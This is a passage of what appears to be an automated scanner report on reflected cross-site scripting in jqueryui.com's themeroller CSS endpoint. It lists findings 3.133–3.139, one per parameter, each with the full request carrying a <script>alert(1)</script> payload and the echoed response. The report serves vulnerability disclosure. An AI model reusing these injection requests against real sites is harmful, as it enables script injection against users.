ighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:28 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif22354<script>alert(1)</script>88ba43d4577&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgCol
...[SNIP]...

3.133. http://jqueryui.com/themeroller/css/parseTheme.css.php [fsDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fsDefault request parameter is copied into the HTML document as plain text between tags. The payload f7d5c<script>alert(1)</script>a45f3b7d724 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1emf7d5c<script>alert(1)</script>a45f3b7d724&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:29 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1emf7d5c<script>alert(1)</script>a45f3b7d724&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent
...[SNIP]...

3.134. http://jqueryui.com/themeroller/css/parseTheme.css.php [fwDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fwDefault request parameter is copied into the HTML document as plain text between tags. The payload 577ef<script>alert(1)</script>e138d86eb4c was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal577ef<script>alert(1)</script>e138d86eb4c&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:28 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17401


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal577ef<script>alert(1)</script>e138d86eb4c&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&
...[SNIP]...

3.135. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorActive request parameter is copied into the HTML document as plain text between tags. The payload e1406<script>alert(1)</script>bdab54bbfea was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545e1406<script>alert(1)</script>bdab54bbfea&bgColorHighlight=fbf9ee84d7e HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e"><script>alert(1)</script>7a510e251a9&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:53:03 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17458


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
r=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545e1406<script>alert(1)</script>bdab54bbfea&bgColorHighlight=fbf9ee84d7e
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget sele
...[SNIP]...

3.136. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorContent request parameter is copied into the HTML document as plain text between tags. The payload 498fa<script>alert(1)</script>150ef89942d was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222498fa<script>alert(1)</script>150ef89942d&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:32 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
derColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222498fa<script>alert(1)</script>150ef89942d&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

3.137. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorDefault request parameter is copied into the HTML document as plain text between tags. The payload 4487a<script>alert(1)</script>5ee7c8ec65f was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=8888884487a<script>alert(1)</script>5ee7c8ec65f&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:34 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
olorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=8888884487a<script>alert(1)</script>5ee7c8ec65f&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d
*/


/* Component containers
---------------
...[SNIP]...

3.138. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorHeader request parameter is copied into the HTML document as plain text between tags. The payload baa37<script>alert(1)</script>5121dc7b14b was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222baa37<script>alert(1)</script>5121dc7b14b&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:31 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222baa37<script>alert(1)</script>5121dc7b14b&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOp
...[SNIP]...

3.139. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorHover request parameter is copied into the HTML document as plain text between tags. The payload aa434<script>alert(1)</script>91843ffacb2 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545aa434<script>alert(1)</script>91843ffacb2&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:36 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17319


